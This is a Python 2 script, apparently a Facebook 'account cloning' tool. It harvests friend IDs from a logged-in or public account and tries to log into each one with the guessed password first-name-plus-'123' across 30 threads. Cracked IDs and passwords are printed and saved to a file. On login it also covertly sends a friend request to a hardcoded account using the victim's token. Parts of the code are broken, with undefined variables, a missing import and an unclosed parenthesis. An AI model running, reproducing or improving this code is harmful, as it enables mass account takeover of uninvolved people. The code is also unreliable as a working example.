#!/usr/bin/python2

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
	print "\x1b[1;91mExit"
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.02)

#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'

#Dev:KASHI TEACHES
#### LOGO ####
logo = """

\033[1;91m  ___             
\033[1;92m / _ \            
\033[1;93m/ /_\ \ _ __ ___  
\033[1;94m|  _  || '_ ` _ \ 
\033[1;95m| | | || | | | | |
\033[1;96m\_| |_/|_| |_| |_|
                            
\033[1;91m ______   _______  _______  _        ______  
\033[1;92m(  ___ \ (  ____ )(  ___  )( (    /|(  __  \ 
\033[1;93m| (   ) )| (    )|| (   ) ||  \  ( || (  \  )
\033[1;96m| (__/ / | (____)|| (___) ||   \ | || |   ) |
\033[1;94m|  __ (  |     __)|  ___  || (\ \) || |   | |
\033[1;95m| (  \ \ | (\ (   | (   ) || | \   || |   ) |
\033[1;91m| )___) )| ) \ \__| )   ( || )  \  || (__/  )
\033[1;92m|/ \___/ |/   \__/|/     \||/    )_)(______/ 
"""
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
back = 0
threads = []
sucessful = []
checkpoint = []
oks = []
action_failed = []
idfriends = []
idfromfriends = []
member_id = []
email= []
number = []
id = []
em = []
email_from_friends = []
hp = []
hpfromfriends = []
reaction = []
reactiongroup = []
comment = []
group_comment = []
listgroup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

##### LICENSE #####
#=================#
def lisensi():
	os.system('clear')
	login()
####login#########
def tool_main_function():
	os.system('clear')
	print logo
	print "\033[1;97mENTER\033[1;91m> \033[1;92mlogin \033[1;97mTHEN LOGIN YOUR ACCOUNT"
	print "\033[1;97mENTER\033[1;91m> \033[1;92mtoken \033[1;97mTHEN ENTER YOUR TOKEN"
	print "\033[1;97mENTER\033[1;91m> \033[1;91mclose\033[1;97m THEN CLOSE PROGRAM"
	
	login_method = raw_input("\033[1;97m>>\033[1;91m>>> \033[1;97m")
	if login_method =="":
		print"\033[1;91m[!] Wrong input"
		exit()
	elif login_method =="login":
		login()
	elif login_method =="token":
		fbtoken()
	elif login_method =="close":
		exit()
	else:
		print"\033[1;91m[!] Wrong input"
		exit()


##### LOGIN #####
#================#
def login():
	os.system('clear')
	try:
		fb_token = open('login.txt','r')
		menu()
	except (KeyError,IOError):
		os.system('clear')
		print logo
		print('\033[1;91m[#] \033[1;92mNEW FACEBOOK ACCOUNT LOGIN \033[1;91m[#]')
		id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
		pwd = getpass.getpass('\033[1;91m[+] \033[1;36mPassword \033[1;91m:\033[1;92m ')
		load()
		try:
			br.open('https://m.facebook.com')
		except mechanize.URLError:
			print"\n\033[1;91m[!] No connection"
			exit()
		br._factory.is_html = True
		br.select_form(nr=0)
		br.form['email'] = id
		br.form['pass'] = pwd
		br.submit()
		url = br.geturl()
		if 'save-device' in url:
			try:
				sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
				data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
				x=hashlib.new("md5")
				x.update(sig)
				a=x.hexdigest()
				data.update({'sig':a})
				url = "https://api.facebook.com/restserver.php"
				r=requests.get(url,params=data)
				z=json.loads(r.text)
				pick = open("login.txt", 'w')
				pick.write(z['access_token'])
				pick.close()
				print '\n\033[1;91m[\033[1;96m\033[1;91m] \033[1;92mLogin successfully'
                                requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
				menu()
			except requests.exceptions.ConnectionError:
				print"\n\033[1;91m[!] No connection"
				exit()
		if 'checkpoint' in url:
			print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
			os.system('rm -rf login.txt')
			time.sleep(1)
			exit()
		else:
			print("\n\033[1;91m[!] Login Failed")
			os.system('rm -rf login.txt')
			time.sleep(0.01)
			login()

##### TOKEN #####
def fbtoken():
	os.system('clear')
	print logo
	fb_token = raw_input("\033[1;91m[?] \033[1;92mENTER YOUR ACCOUNT TOKEN\033[1;91m : \033[1;97m")
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+fb_token)
		a = json.loads(otw.text)
		fb_name = a['name']
		pick = open("login.txt", 'w')
		pick.write(fb_token)
		pick.close()
		menu()
	except KeyError:
		print "\033[1;91m[!] Wrong"
		e = raw_input("\033[1;91m[?] \033[1;92mWANT TO PICK  UP TOKEN?\033[1;97m[y/n]: ")
		if e =="":
			exit()
		elif e =="y":
			login()
		else:
			exit()
##### MENU ##########################################
def menu():
	os.system('clear')
	try:
		fb_token=open('login.txt','r').read()
	except IOError:
		os.system('clear')
		print"\033[1;91m[!] Token not found"
		os.system('rm -rf login.txt')
		time.sleep(0.01)
		login()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+fb_token)
		a = json.loads(otw.text)
		fb_name = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
		os.system('rm -rf login.txt')
		time.sleep(0.01)
		login()
	except requests.exceptions.ConnectionError:
		print"\033[1;91m[!] No connection"
		exit()
	os.system("reset")
	print logo
	print " STAR BOY"
	print 47*"\033[1;96m="
	print "\033[1;91m[\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;91m]\033[1;97mNAME \033[1;91m: \033[1;92m"+fb_name+"\033[1;97m"
	print "\033[1;96m[\033[1;97m \033[1;96m]\033[1;93m[\033[1;92m\xe2\x9c\x93\033[1;97m]ACCOUNT \033[1;91m: \033[1;92m"+id+"\x1b[1;97m              "
	print 47*"\033[1;96m="
	jalan("\x1b[1;91mTYPE\x1b[1;92m clone \x1b[1;91m\x1b[1;93mTHEN START CLONING")
	print
    
	pilih()
def pilih():
	unikers = raw_input("\033[1;97m>>\033[1;97m>> \033[1;97m")
	if unikers =="":
		print "\033[1;96m \x1b[1;91mWARNING"
		pilih()
	elif unikers =="clone":
		super()
	elif unikers =="2":
		jalan('Token Removed')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\033[1;96m \x1b[1;91mFill in correctly"
		pilih()
def super():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;96m \x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo
	print "\033[1;97m\033[1;91m> \033[1;92m1.\033[1;96m CRACK YOUR ACCOUNT FRIENDS LIST"
	print "\033[1;97m\033[1;91m> \033[1;92m2.\033[1;93m CRACK PUBLIC ACCOUNT FRIENDS LIST"
	print "\033[1;97m\033[1;91m> \033[1;91m0.\033[1;97m CLOSE PROGRAM"
	print "\033[1;97m"
	pilih_super()
def pilih_super():
	peak = raw_input("\033[1;97m>>\033[1;97m >>> \033[1;97m")
	if peak =="":
		print "\033[1;96m \x1b[1;91mWARNING"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo
		print 47*"\033[1;96m="
		jalan('\033[1;96m \033[1;93mGETTING IDS \033[1;97m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif peak =="2":
		os.system('clear')
		print logo
		print 47*"\033[1;96m="
		idt = raw_input("\033[1;96m \033[1;97m[\033[1;93m+\033[1;97m]\033[1;92mENTER ACCOUNT  \033[1;91m: \033[1;97m")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;97m [\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;96mNAME\033[1;91m :\033[1;97m "+op["name"]
		except KeyError:
			print"\033[1;96m \x1b[1;91mID Not Found!"
			raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
			super()
		jalan('\033[1;96m \033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;91mGETTING IDS \033[1;97m...')
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="3":
		os.system('clear')
		print logo
		print 47*"\033[1;96m="
		try:
			idlist = raw_input('\x1b[1;96m \x1b[1;93mENTER FILE PATH \x1b[1;91m: \x1b[1;97m')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '\x1b[1;96m \x1b[1;91mFile Not Found'
			raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
			super()
	elif peak =="0":
		menu()
	else:
		print "\033[1;96m \x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;96m \033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;95mTOTAL ACCOUNT\033[1;91m: \033[1;97m"+str(len(id))
	jalan('\033[1;96m \033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;93mSTAR BOY\033[1;97m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;97m [\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;94mPLEASE WAIT, PROCESS IS START\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
	print
	print('\x1b[1;96m \x1b[1;97m[\033[1;91m!\033[1;97m]\033[1;94mTO STOP THIS PROCESS PRESS Ctrl THEN z ')
	print 47*"\033[1;96m="
	def main(arg):
		global oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:													
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)												
			b = json.loads(a.text)												
			pass1 = b['first_name'] + '123'												
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			q = json.load(data)												
			if 'access_token' in q:
				x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				z = json.loads(x.text)
				print '\x1b[1;91m \x1b[1;92mValid_OK100%'											
				print '\x1b[1;91m[+] \x1b[1;91mName \x1b[1;91m    : \x1b[1;91m' + b['name']											
				print '\x1b[1;91m[+] \x1b[1;91mID \x1b[1;91m      : \x1b[1;91m' + user											
				print '\x1b[1;91m[+] \x1b[1;91mPassword \x1b[1;91m: \x1b[1;91m' + pass1 + '\n'											
				oks.append(user+pass1)
                        else:
			        if 'www.facebook.com' in q["error_msg"]:
				    print '\x1b[1;93m\x1b[1;96mInvalid_CP'
				    print '\x1b[1;93m[+] \x1b[1;93mName \x1b[1;93m    : \x1b[1;93m' + b ['name']
				    print '\x1b[1;93m[+] \x1b[1;93mID \x1b[1;93m      : \x1b[1;93m' + user
				    print '\x1b[1;93m[+] \x1b[1;93mPassword \x1b[1;93m: \x1b[1;93m' + pass1 + '\n'
				    cek = open("out/super_cp.txt", "a")
				    cek.write("ID:" +user+ " Pw:" +pass1+"\n")
				    cek.close()
				    cekpoint.append(user+pass1
				
                                	
											                               
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 42*"\033[1;97m="
	print '\033[1;96m[\033[1;97m\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
	print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
	print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
	raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
	login()
if __name__=='__main__':
        tool_main_function()


